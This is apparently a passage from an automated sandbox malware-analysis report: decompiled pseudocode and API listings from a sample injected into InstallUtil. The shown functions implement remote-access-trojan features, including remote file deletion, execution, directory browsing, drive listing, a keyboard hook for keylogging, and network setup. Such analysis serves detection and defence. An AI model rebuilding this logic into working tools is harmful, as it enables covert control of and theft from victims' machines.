
				_t101 = _a4;
				if(_t101 != 0) {
					_t60 = _t59 | 0xffffffff;
					_t120 = _t60 % _a8;
					__eflags = _t60 / _a8 - _t101;
					if(_t60 / _a8 >= _t101) {
						_t102 = _t101 * _a8;
						__eflags = _a12;
						if(__eflags == 0) {
							L8:
							_t62 = E00430E1B(_t120, _t127, __eflags, _t102); // executed
							_t104 = _t62;
							goto L9;
						} else {
							__eflags = _t102 - 0x1000;
							if(__eflags < 0) {
								goto L8;
							} else {
								_t64 = _t102 + 0x23;
								__eflags = _t102 + 0x23 - _t102;
								if(__eflags <= 0) {
									goto L3;
								} else {
									_t91 = E00430E1B(_t120, _t127, __eflags, _t64);
									_t11 = _t91 + 0x23; // 0x23
									_t104 = _t11 & 0xffffffe0;
									 *((intOrPtr*)(_t104 - 4)) = _t91;
									L9:
									return _t104;
								}
							}
						}
					} else {
						L3:
						_t133 = _t137;
						_t138 = _t137 - 0xc;
						E0043150B( &_v16);
						E00435A36( &_v16,  &E00468CEC);
						asm("int3");
						_push(_t133);
						_t134 = _t138;
						E0043153E( &_v32);
						E00435A36( &_v32, 0x468d24);
						asm("int3");
						_push(_t134);
						 *0x46cd0c =  *0x46cd0c & 0x00000000;
						 *0x46c010 =  *0x46c010 | 1;
						_t71 = IsProcessorFeaturePresent(0xa);
						__eflags = _t71;
						if(_t71 != 0) {
							_v28 = _v28 & 0x00000000;
							 *0x46c010 =  *0x46c010 | 0x00000002;
							_push(_t127);
							 *0x46cd0c = 1;
							_t122 =  &_v52;
							_push(1);
							asm("cpuid");
							_pop(_t97);
							 *_t122 = 0;
							 *((intOrPtr*)(_t122 + 4)) = 1;
							 *((intOrPtr*)(_t122 + 8)) = 0;
							 *(_t122 + 0xc) = _t120;
							_v20 = _v52;
							__eflags = _v40 ^ 0x49656e69 | _v44 ^ 0x6c65746e | _v48 ^ 0x756e6547;
							_t79 = 1;
							_t112 = 0;
							_push(1);
							asm("cpuid");
							_pop(_t98);
							 *_t122 = _t79;
							 *((intOrPtr*)(_t122 + 4)) = _t97;
							 *((intOrPtr*)(_t122 + 8)) = _t112;
							 *(_t122 + 0xc) = _t120;
							if((_v40 ^ 0x49656e69 | _v44 ^ 0x6c65746e | _v48 ^ 0x756e6547) != 0) {
								L21:
								_t123 =  *0x46cd10; // 0x2
							} else {
								_t90 = _v52 & 0x0fff3ff0;
								__eflags = _t90 - 0x106c0;
								if(_t90 == 0x106c0) {
									L20:
									_t126 =  *0x46cd10; // 0x2
									_t123 = _t126 | 0x00000001;
									 *0x46cd10 = _t123;
								} else {
									__eflags = _t90 - 0x20660;
									if(_t90 == 0x20660) {
										goto L20;
									} else {
										__eflags = _t90 - 0x20670;
										if(_t90 == 0x20670) {
											goto L20;
										} else {
											__eflags = _t90 - 0x30650;
											if(_t90 == 0x30650) {
												goto L20;
											} else {
												__eflags = _t90 - 0x30660;
												if(_t90 == 0x30660) {
													goto L20;
												} else {
													__eflags = _t90 - 0x30670;
													if(_t90 != 0x30670) {
														goto L21;
													} else {
														goto L20;
													}
												}
											}
										}
									}
								}
							}
							__eflags = _v20 - 7;
							_v36 = _v40;
							_t81 = _v44;
							_v16 = _t81;
							_v32 = _t81;
							if(_v20 >= 7) {
								_t87 = 7;
								_push(_t98);
								asm("cpuid");
								_t100 =  &_v52;
								 *_t100 = _t87;
								 *((intOrPtr*)(_t100 + 4)) = _t98;
								 *((intOrPtr*)(_t100 + 8)) = 0;
								 *(_t100 + 0xc) = _t120;
								_t88 = _v48;
								__eflags = _t88 & 0x00000200;
								_v28 = _t88;
								_t81 = _v16;
								if((_t88 & 0x00000200) != 0) {
									_t125 = _t123 | 0x00000002;
									__eflags = _t125;
									 *0x46cd10 = _t125;
								}
							}
							__eflags = _t81 & 0x00100000;
							if((_t81 & 0x00100000) != 0) {
								 *0x46c010 =  *0x46c010 | 0x00000004;
								 *0x46cd0c = 2;
								__eflags = _t81 & 0x08000000;
								if((_t81 & 0x08000000) != 0) {
									__eflags = _t81 & 0x10000000;
									if((_t81 & 0x10000000) != 0) {
										asm("xgetbv");
										_v24 = _t81;
										_v20 = _t120;
										__eflags = (_v24 & 0x00000006) - 6;
										if((_v24 & 0x00000006) == 6) {
											__eflags = 0;
											if(0 == 0) {
												_t84 =  *0x46c010; // 0x2f
												_t85 = _t84 | 0x00000008;
												 *0x46cd0c = 3;
												__eflags = _v28 & 0x00000020;
												 *0x46c010 = _t85;
												if((_v28 & 0x00000020) != 0) {
													_t86 = _t85 | 0x00000020;
													__eflags = _t86;
													 *0x46cd0c = 5;
													 *0x46c010 = _t86;
												}
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}

0x0040161e
0x00401624
0x00401629
0x0040162e
0x00401632
0x00401634
0x0040163b
0x00401640
0x00401645
0x00401668
0x00401669
0x0040166f
0x00000000
0x00401647
0x00401647
0x0040164d
0x00000000
0x0040164f
0x0040164f
0x00401652
0x00401654
0x00000000
0x00401656
0x00401657
0x0040165d
0x00401660
0x00401663
0x00401671
0x00401673
0x00401673
0x00401654
0x0040164d
0x00401636
0x00401636
0x00431557
0x00431559
0x0043155f
0x0043156d
0x00431572
0x00431573
0x00431574
0x0043157c
0x0043158a
0x0043158f
0x00431590
0x00431593
0x004315a1
0x004315a9
0x004315ae
0x004315b0
0x004315b6
0x004315bc
0x004315c5
0x004315c7
0x004315cd
0x004315d0
0x004315d1
0x004315d5
0x004315d6
0x004315d8
0x004315db
0x004315de
0x004315e7
0x00431604
0x00431606
0x00431609
0x0043160a
0x0043160b
0x0043160f
0x00431610
0x00431612
0x00431615
0x00431618
0x0043161b
0x00431660
0x00431660
0x0043161d
0x00431620
0x00431625
0x0043162a
0x0043164f
0x0043164f
0x00431655
0x00431658
0x0043162c
0x0043162c
0x00431631
0x00000000
0x00431633
0x00431633
0x00431638
0x00000000
0x0043163a
0x0043163a
0x0043163f
0x00000000
0x00431641
0x00431641
0x00431646
0x00000000
0x00431648
0x00431648
0x0043164d
0x00000000
0x00000000
0x00000000
0x00000000
0x0043164d
0x00431646
0x0043163f
0x00431638
0x00431631
0x0043162a
0x00431666
0x0043166d
0x00431670
0x00431673
0x00431676
0x00431679
0x0043167d
0x00431680
0x00431681
0x00431686
0x00431689
0x0043168b
0x0043168e
0x00431691
0x00431694
0x00431697
0x0043169c
0x0043169f
0x004316a2
0x004316a4
0x004316a4
0x004316a7
0x004316a7
0x004316a2
0x004316af
0x004316b4
0x004316b6
0x004316bd
0x004316c7
0x004316cc
0x004316ce
0x004316d3
0x004316d7
0x004316da
0x004316dd
0x004316eb
0x004316ee
0x004316f0
0x004316f2
0x004316f4
0x004316f9
0x004316fc
0x00431706
0x0043170a
0x0043170f
0x00431711
0x00431711
0x00431714
0x0043171e
0x0043171e
0x0043170f
0x004316f2
0x004316ee
0x004316d3
0x004316cc
0x004316b4
0x00431723
0x00431729
0x00431729
0x00401626
0x00401628
0x00401628

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5253ddd10c1c34c0a749f43adec96a1d39af4a7794a61d16a0385bbc4e38a8e
Instruction ID: 62c3818e98da017e1fca948137a6df447d2c96562f3af687e90aa36426572ec8
Opcode Fuzzy Hash: b5253ddd10c1c34c0a749f43adec96a1d39af4a7794a61d16a0385bbc4e38a8e
Instruction Fuzzy Hash: 82F082702052016ACB1C8734CD65B2A76954B85355F249F3FF06BD61E1D73ACD96C60D

Uniqueness

Uniqueness Score: -1.00%

Function 004124C2 Relevance: 3.0, APIs: 2, Instructions: 21
networkCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E004124C2(void* __ecx, void* __edx) {
				intOrPtr* _t1;
				void* _t2;
				void* _t6;
				void* _t7;
				void* _t8;

				_t1 =  *0x46fdc0;
				_t7 = __edx;
				_t6 = __ecx;
				if(_t1 == 0) {
					_t1 = E0041235F();
					 *0x46fdc0 = _t1;
				}
				_t2 =  *_t1(_t6, _t7, 0, 0x46dacc); // executed
				_t8 = _t2;
				__imp__#112(_t8);
				return _t8;
			}

0x004124c2
0x004124c8
0x004124cb
0x004124cf
0x004124d1
0x004124d6
0x004124d6
0x004124e4
0x004124e6
0x004124e9
0x004124f3

APIs

getaddrinfo.WS2_32(00000000,00000000,00000000,0046DACC,0046E600,00000000,00412761,00000000,00000001), ref: 004124E4
WSASetLastError.WS2_32(00000000), ref: 004124E9

Part of subcall function 0041235F: GetSystemDirectoryA.KERNEL32 ref: 004123AE
Part of subcall function 0041235F: LoadLibraryA.KERNEL32(?), ref: 004123F0
Part of subcall function 0041235F: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00412410
Part of subcall function 0041235F: FreeLibrary.KERNEL32(00000000), ref: 00412417
Part of subcall function 0041235F: LoadLibraryA.KERNEL32(?), ref: 0041244F
Part of subcall function 0041235F: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00412461
Part of subcall function 0041235F: FreeLibrary.KERNEL32(00000000), ref: 00412468
Part of subcall function 0041235F: GetProcAddress.KERNEL32(00000000,?), ref: 00412477

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
String ID:
API String ID: 1170566393-0
Opcode ID: e9d8b26983078d7839e2644e854225252bff1ecd1ec221a198454c4b0a4a66a5
Instruction ID: 6d644d45d32815caf5efc1f8d7381c6379b5bc5e2a8c879a2a639a0c61cb5c63
Opcode Fuzzy Hash: e9d8b26983078d7839e2644e854225252bff1ecd1ec221a198454c4b0a4a66a5
Instruction Fuzzy Hash: 97D012726001216B9310A769AC04BFB669CEBD66657050037F414D3111F6D45C5142A9

Uniqueness

Uniqueness Score: -1.00%

Function 00408651 Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00408651(void* __ebx, void* __edi, void* __eflags, char _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
				char _v28;
				char _v52;
				char _v76;
				void* __esi;
				void* __ebp;
				void* _t24;
				void* _t25;
				void* _t36;
				void* _t72;
				void* _t75;
				void* _t76;
				void* _t77;

				_t47 = __ebx;
				_t77 = _t76 - 0x4c;
				 *0x46c9c4 = _a4;
				_push(_t72);
				E00401F46(__ebx,  &_v28);
				_t24 = E00438416(_a12);
				_t69 = _a8;
				if(_t24 != 0) {
					_t25 = E0041905E( &_v52, _t69, _a12); // executed
					E00401ED3(0x46e420, _t69, 0x46e420, _t25);
					E00401EC9();
					_t69 = E004078F9( &_v76, 0x46e420, _t75, "\\");
					E00401ED3( &_v28, _t28, 0x46e420, E00402FD4(__ebx,  &_v52, _t28, __edi, _t75, __eflags, _a16));
					E00401EC9();
				} else {
					E00401ED3( &_v28, _t69, _t72, E0041905E( &_v52, _t69, _a16));
				}
				E00401EC9();
				 *0x46e454 =  *0x46e454 & 0x00000000;
				 *0x46e450 = _a20 * 0x3e8;
				 *0x46e3f3 = _a24;
				_t36 =  *0x46c9c4 - 0x31;
				if(_t36 == 0) {
					E0040773A(_t47, _t77 - 0x18, _t69, __eflags,  &_v28);
					E00408935(0x46e3a8, _t69); // executed
				} else {
					_t83 = _t36 == 1;
					if(_t36 == 1) {
						E0040773A(_t47, _t77 - 0x18, _t69, _t83,  &_v28);
						E004089EC(0x46e3a8);
					}
				}
				return E00401EC9();
			}

0x00408651
0x0040865a
0x0040865d
0x00408662
0x00408663
0x0040866b
0x00408670
0x00408679
0x00408695
0x004086a3
0x004086ab
0x004086c3
0x004086d2
0x004086da
0x0040867b
0x00408688
0x0040868d
0x004086e2
0x004086ee
0x004086f5
0x004086fd
0x00408709
0x0040870c
0x00408736
0x00408740
0x0040870e
0x0040870e
0x00408711
0x0040871c
0x00408726
0x00408726
0x00408711
0x00408751

APIs

_wcslen.LIBCMT ref: 0040866B

Part of subcall function 00408935: CreateThread.KERNELBASE(00000000,00000000,00408A37,?,00000000,00000000), ref: 004089BD
Part of subcall function 00408935: CreateThread.KERNELBASE(00000000,00000000,Function_00008A21,?,00000000,00000000), ref: 004089CD
Part of subcall function 00408935: CreateThread.KERNELBASE(00000000,00000000,Function_00008A43,?,00000000,00000000), ref: 004089D9

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CreateThread$_wcslen
String ID:
API String ID: 1119755333-0
Opcode ID: ac323117cbdf0563bfcb29240a8b004708b4cfa17b4c3b8b3985ce47f125244b
Instruction ID: 7c739b3e14c6aaae9f1388b9b253f3f0d8d515182886c5f67db4714b133ee797
Opcode Fuzzy Hash: ac323117cbdf0563bfcb29240a8b004708b4cfa17b4c3b8b3985ce47f125244b
Instruction Fuzzy Hash: D62193758141495ACB05FF76ED628FE7BB8AF10308F10403FF841732E2EE386945869A

Uniqueness

Uniqueness Score: -1.00%

Function 00408B21 Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408B21(int __edx, int _a4, void* _a8) {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t10;
				void* _t14;
				struct HHOOK__** _t19;
				signed int _t20;
				int _t31;

				_t26 = __edx;
				_t19 =  *0x46dae8; // 0x46e3a8
				_t31 = __edx;
				_t2 =  &(_t19[0x13]); // 0x46e3f4
				_t20 = 5;
				memcpy(_t2, _a8, _t20 << 2);
				if(_t31 == 0) {
					_t10 = _a4 - 0x100;
					if(_t10 == 0) {
						E00409D74(_t19);
						if(E004098AF(_t19, _t19) == 0) {
							E00409B7B(_t19, _t19, _t26); // executed
						}
					} else {
						_t14 = _t10 - 1;
						if(_t14 == 0) {
							E00409D88(_t19);
							E00409D2E(_t19, _t19);
						} else {
							if(_t14 == 3) {
								E00409CD4(_t19, _t19, _t26);
							}
						}
					}
				}
				return CallNextHookEx( *_t19, _t31, _a4, _a8);
			}

0x00408b21
0x00408b23
0x00408b2f
0x00408b32
0x00408b37
0x00408b38
0x00408b3c
0x00408b42
0x00408b47
0x00408b6c
0x00408b78
0x00408b7c
0x00408b7c
0x00408b49
0x00408b49
0x00408b4c
0x00408b5e
0x00408b63
0x00408b4e
0x00408b51
0x00408b55
0x00408b55
0x00408b51
0x00408b4c
0x00408b47
0x00408b97

APIs

CallNextHookEx.USER32 ref: 00408B8C

Part of subcall function 00409CD4: GetKeyState.USER32(00000011), ref: 00409CD9

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CallHookNextState
String ID:
API String ID: 3280314413-0
Opcode ID: 9e25466f24c74d7198f88964cf7fa652263210040eeb58fd821b66de32517e40
Instruction ID: 0bfc7fbe7ec38a0f543e81c1e979400371ef823df0c219fcd9bb6f72e4d5308b
Opcode Fuzzy Hash: 9e25466f24c74d7198f88964cf7fa652263210040eeb58fd821b66de32517e40
Instruction Fuzzy Hash: 5EF026B26042088BCA047E799D4182B7765EFD0324F00043FFD82662D3CE39AC059359

Uniqueness

Uniqueness Score: -1.00%

Function 004421F7 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E004421F7(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00439941())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x46da4c, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00441605();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E0043F040(_t7, _t8, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x004421f7
0x004421fd
0x00442203
0x00442235
0x0044223a
0x00442240
0x00000000
0x00442240
0x00442207
0x00442209
0x00442209
0x00442220
0x00442229
0x00442231
0x00000000
0x00000000
0x00442211
0x00442213
0x00000000
0x00000000
0x00442216
0x0044221b
0x0044221c
0x0044221e
0x00000000
0x00000000
0x0044221e
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00431BAF,?,?,00435157,?,?,?,?,?,0040B882,00431BAF,?,?,?,?), ref: 00442229

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7c571a3b0239bc88ac616669ac918d5d3baa0a1dddb41d42e6ba6a31e426335f
Instruction ID: 8f966932ec339c1ad80b894952239f269ffdb0563d311d850b1746e36c8e53a8
Opcode Fuzzy Hash: 7c571a3b0239bc88ac616669ac918d5d3baa0a1dddb41d42e6ba6a31e426335f
Instruction Fuzzy Hash: 84E0E52150522257F6212A66AE0575B7A48BF5A3F0F6501A7FC0896291DEECCD1081AE

Uniqueness

Uniqueness Score: -1.00%

Function 00404875 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 0040488A

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 5a5bcd61a2a750b2626bb476a6100c07c37620ca65ab93537e366a0bec14f4a4
Instruction ID: bde307b9e9911254b3c92d87092e3ab444a03bdd01bd17ab307d4b39b127da09
Opcode Fuzzy Hash: 5a5bcd61a2a750b2626bb476a6100c07c37620ca65ab93537e366a0bec14f4a4
Instruction Fuzzy Hash: FDD0123299C60C4ED610BAB4AC0F9B5775CD313619F0403BAACB5835D3F640572CC2AB

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00406571 Relevance: 30.4, APIs: 8, Strings: 9, Instructions: 693
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00406571(short* __edx, void* __eflags, intOrPtr _a4) {
				char _v132;
				char _v136;
				char _v152;
				char _v160;
				char _v168;
				char _v176;
				char _v180;
				char _v184;
				void* _v200;
				char _v204;
				char _v216;
				char _v224;
				char _v228;
				char _v232;
				void* _v236;
				char _v240;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				void* _v272;
				char _v276;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				void* _v324;
				void* _v332;
				char _v336;
				char _v348;
				char _v356;
				char _v360;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t158;
				signed int _t160;
				void* _t179;
				int _t190;
				void* _t194;
				void* _t198;
				signed char _t210;
				signed int _t212;
				void* _t216;
				void* _t221;
				signed int _t222;
				void* _t231;
				short* _t237;
				void* _t238;
				void* _t249;
				void* _t266;
				void* _t276;
				void* _t293;
				void* _t294;
				void* _t307;
				void* _t314;
				void* _t318;
				void* _t319;
				void* _t323;
				void* _t334;
				void* _t342;
				void* _t426;
				void* _t429;
				short* _t553;
				intOrPtr _t560;
				intOrPtr _t561;
				signed int _t562;
				signed int _t565;
				signed int _t566;
				signed int _t568;
				void* _t570;
				void* _t572;
				void* _t574;
				void* _t575;
				void* _t576;
				void* _t580;
				signed int _t581;
				void* _t584;
				void* _t585;
				void* _t586;
				void* _t592;
				void* _t593;
				void* _t594;
				void* _t595;
				void* _t597;
				void* _t598;
				void* _t599;
				void* _t600;
				void* _t601;
				void* _t617;
				void* _t618;
				void* _t619;
				void* _t621;
				void* _t623;
				void* _t632;

				_t631 = __eflags;
				_t539 = __edx;
				_push(_t342);
				_t560 = _a4;
				E004020B6(_t342,  &_v180, __edx, __eflags, _t560 + 0xc);
				SetEvent( *(_t560 + 0x24));
				_t561 =  *((intOrPtr*)(E00401F6B( &_v184)));
				E00404162( &_v184,  &_v160, 4, 0xffffffff);
				_t584 = (_t581 & 0xfffffff8) - 0x104;
				E004020B6(_t342, _t584, _t539, _t631, 0x46e260);
				_t585 = _t584 - 0x18;
				E004020B6(_t342, _t585, _t539, _t631,  &_v176);
				E0041851D( &_v312, _t539);
				_t586 = _t585 + 0x30;
				_t632 = _t561 - 0x8c;
				if(_t632 > 0) {
					_t562 = _t561 - 0x8d;
					__eflags = _t562;
					if(__eflags == 0) {
						E0040413E(0,  &_v280, _t539, _t580, E00401F6B(E00401E25( &_v288, _t539, _t580, __eflags, 0)));
						E0040413E(0,  &_v216, _t539, _t580, E00401F6B(E00401E25( &_v296, _t539, _t580, __eflags, 1)));
						E004076F1( &_v300,  &_v252, 0, E0040770B( &_v292,  &_v216,  &_v216) + 1);
						_t158 = E00401EC4(E004079E2( &_v288,  &_v264, _t580,  &_v240));
						_t160 = E00438AE0(E00401EC4( &_v312), _t158);
						asm("sbb bl, bl");
						E00401EC9();
						_t346 =  ~_t160 + 1;
						__eflags =  ~_t160 + 1;
						if( ~_t160 + 1 == 0) {
							_t539 = E004052F5( &_v252, "Unable to rename file!", _t580, 0x46e260);
							E0040793B(_t346, _t586 - 0x18, _t162, 0x46e260, _t580, __eflags, "16");
							_push(0x59);
							E00404A78(0x46e328, _t162, __eflags);
							E00401F98();
						} else {
							_t539 =  &_v228;
							E004078F9(_t586 - 0x18,  &_v228, _t580, "*");
							E0040620E();
						}
						E00401EC9();
						L41:
						E00401EC9();
						L42:
						E00401EC9();
						L43:
						E00401E4D( &_v308, _t539);
						E00401F98();
						E00401F98();
						return 0;
					}
					_t565 = _t562 - 1;
					__eflags = _t565;
					if(__eflags == 0) {
						E0040413E(0,  &_v280, _t539, _t580, E00401F6B(E00401E25( &_v288, _t539, _t580, __eflags, 0)));
						_t179 = E00401F6B(E00401E25( &_v296, _t539, _t580, __eflags, 1));
						_t539 =  &_v288;
						CreateDirectoryW(E00401EC4(E004078F9( &_v264,  &_v288, _t580, _t179)), 0);
						E00401EC9();
						E0040320F(0x2a);
						E0040773A(0, _t586 - 0x18,  &_v288, __eflags,  &_v292);
						L26:
						E0040620E();
						goto L42;
					}
					_t566 = _t565 - 3;
					__eflags = _t566;
					if(__eflags == 0) {
						_t190 = StrToIntA(E00401F6B(E00401E25( &_v288, _t539, _t580, __eflags, 0)));
						_t539 = E00401F6B(E00401E25( &_v292, _t539, _t580, __eflags, 1));
						E00418F13(_t190, _t192);
					} else {
						_t568 = _t566 - 0x24;
						__eflags = _t568;
						if(__eflags == 0) {
							 *0x46dae4 = 0;
							_t194 = E00401E25( &_v288, _t539, _t580, __eflags, 2);
							_t592 = _t586 - 0x18;
							E004020B6(0, _t592, _t539, __eflags, _t194);
							_t593 = _t592 - 0x18;
							E0040413E(0, _t593, _t539, _t580, 0x4610ec);
							_t198 = E00401F6B(E00401E25( &_v300, _t539, _t580, __eflags, 0));
							_t594 = _t593 - 0x18;
							E0040413E(0, _t594, _t539, _t580, _t198);
							E00401E25( &_v308, _t539, _t580, __eflags, 1);
							E00406EEF(E00418513(__eflags), _t539, __eflags);
							_t595 = _t594 + 0x48;
							__eflags =  *0x46dae4; // 0x0
							if(__eflags == 0) {
								Sleep(0x7d0);
								E004020B6(0, _t595 - 0x18, _t539, __eflags, E00401E25( &_v288, _t539, _t580, __eflags, 0));
								_push(0xb9);
								E00404A78(0x46e328, _t539, __eflags);
							}
						} else {
							__eflags = _t568 == 3;
							if(_t568 == 3) {
								 *0x46dae4 = 1;
							}
						}
					}
					goto L43;
				}
				if(_t632 == 0) {
					E0040413E(_t342,  &_v280, _t539, _t580, E00401F6B(E00401E25( &_v288, _t539, _t580, __eflags, 0)));
					_t210 = GetFileAttributesW(E00401EC4( &_v284));
					__eflags = _t210 & 0x00000010;
					if((_t210 & 0x00000010) == 0) {
						_t212 = DeleteFileW(E00401EC4( &_v284));
					} else {
						_t212 = E004187B1(E00401EC4( &_v284), _t539);
					}
					__eflags = _t212;
					__eflags = _t212 & 0xffffff00 | _t212 != 0x00000000;
					if(__eflags == 0) {
						_t597 = _t586 - 0x18;
						E00418445(_t342, _t597,  &_v276);
						_push(0x55);
						E00404A78(0x46e328,  &_v276, __eflags);
						_t216 = E004183E5( &_v280,  &_v304);
						_t598 = _t597 - 0x18;
						_t544 = "Unable to delete: ";
						E004052D4(_t342, _t598, "Unable to delete: ", _t580, __eflags, _t216);
						_t599 = _t598 - 0x14;
						_t426 = _t599;
						_push("E");
					} else {
						_t231 = E004183E5( &_v252,  &_v276);
						_t601 = _t586 - 0x18;
						_t544 = "Deleted file: ";
						E004052D4(_t342, _t601, "Deleted file: ", _t580, __eflags, _t231);
						_t599 = _t601 - 0x14;
						_t426 = _t599;
						_push("i");
					}
					E00402053(_t342, _t426, _t544, _t580);
					E00417D02(_t342, 0x46e260);
					_t600 = _t599 + 0x30;
					E00401F98();
					_t221 = E00401E25( &_v312, _t544, _t580, __eflags, 1);
					_t539 = "1";
					_t429 = _t221;
					_t222 = E00405ADC("1");
					__eflags = _t222;
					if(_t222 == 0) {
						goto L42;
					} else {
						__eflags = E0040770B( &_v296, _t429, _t429) + 1;
						E00407727(E0040770B( &_v296, _t429, _t429) + 1);
						_push(0x2a);
						_t539 =  &_v308;
						E00401ED3( &_v308,  &_v308, _t561, E00402F32(_t342,  &_v284,  &_v308, _t580));
						E00401EC9();
						E0040413E(_t342, _t600 - 0x18,  &_v308, _t580, E00401EC4( &_v312));
						goto L26;
					}
				}
				_t570 = _t561 - 0x61;
				if(_t570 == 0) {
					E0040413E(_t342, _t586 - 0x18, _t539, _t580, E00401F6B(E00401E25( &_v288, _t539, _t580, __eflags, 0)));
					_t237 = E00401E25( &_v296, _t539, _t580, __eflags, 2);
					_t238 = E00401E25( &_v300, _t539, _t580, __eflags, 1);
					_t539 = _t237;
					E004178D4(_t238, _t237);
					goto L43;
				}
				_t572 = _t570 - 0x26;
				if(_t572 == 0) {
					GetLogicalDriveStringsA(0x64,  &_v132);
					E00402077(_t342,  &_v276, _t539, _t580, __eflags,  &_v132, 0x64);
					__eflags = E00407781( &_v284, 0x4611d8, 0, 2) + 1;
					E00401F5D(E00407781( &_v284, 0x4611d8, 0, 2) + 1);
					E004020B6(_t342, _t586 - 0x18, _t539, E00407781( &_v284, 0x4611d8, 0, 2) + 1,  &_v300);
					_t249 = E0040647F(_t342,  &_v232, _t539);
					_t539 = E00402EF1( &_v280,  &_v304, _t580, 0x46e260);
					E00402E61(_t586 - 0x18, _t250, _t249);
					_push(0x51);
					E00404A78(0x46e328, _t250, __eflags);
					E00401F98();
					E00401F98();
					L16:
					E00401F98();
					goto L43;
				}
				_t574 = _t572 - 1;
				if(_t574 == 0) {
					E0040413E(0,  &_v280, _t539, _t580, E00401F6B(E00401E25( &_v288, _t539, _t580, __eflags, 0)));
					E0040773A(0, _t586 - 0x18, _t539, __eflags,  &_v284);
					E0040620E();
					_t266 = E004183E5( &_v276, E004076F1( &_v288,  &_v216, 0, E0040243C() - 2));
					_t539 = "Browsing directory: ";
					E004052D4(0, _t586 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t580, __eflags, _t266);
					E00402053(0, _t586 - 0x18 + 0x18 - 4, "Browsing directory: ", _t580, "i");
					E00417D02(0, 0x46e260);
					E00401F98();
					goto L41;
				}
				_t575 = _t574 - 1;
				if(_t575 == 0) {
					E0040413E(0,  &_v280, _t539, _t580, E00401F6B(E00401E25( &_v288, _t539, _t580, __eflags, 0)));
					ShellExecuteW(0, L"open", E00401EC4( &_v284), 0, 0, 1);
					_t276 = E004183E5( &_v260,  &_v284);
					_t539 = "Executing file: ";
					E004052D4(0, _t586 - 0x18, "Executing file: ", _t580, __eflags, _t276);
					E00402053(0, _t586 - 4, "Executing file: ", _t580, "i");
					E00417D02(0, 0x46e260);
					E00401F98();
					goto L42;
				}
				_t576 = _t575 - 1;
				if(_t576 == 0) {
					 *0x46dae4 = 0;
					E004020B6(0, _t586 - 0x18, _t539, __eflags, E00401E25( &_v288, _t539, _t580, __eflags, 2));
					E0040413E(0, _t586, _t539, _t580, 0x4610ec);
					E0040413E(0, _t586 - 0xffffffffffffffe8, _t539, _t580, E00401F6B(E00401E25( &_v300, _t539, _t580, __eflags, 0)));
					E00401E25( &_v308, _t539, _t580, __eflags, 1);
					E00407168(E00418513(__eflags), _t539);
					goto L43;
				}
				_t577 = _t576 != 1;
				_t638 = _t576 != 1;
				if(_t576 != 1) {
					goto L43;
				} else {
					 *0x46dae4 = 0;
					E0040209F(0,  &_v252);
					E004046B7( &_v132, _t580, 1);
					E0040489F( &_v136, _t577,  &_v132);
					_t293 = E00401E25( &_v296, _t539, _t580, _t638, 3);
					_t617 = _t586 - 0x18;
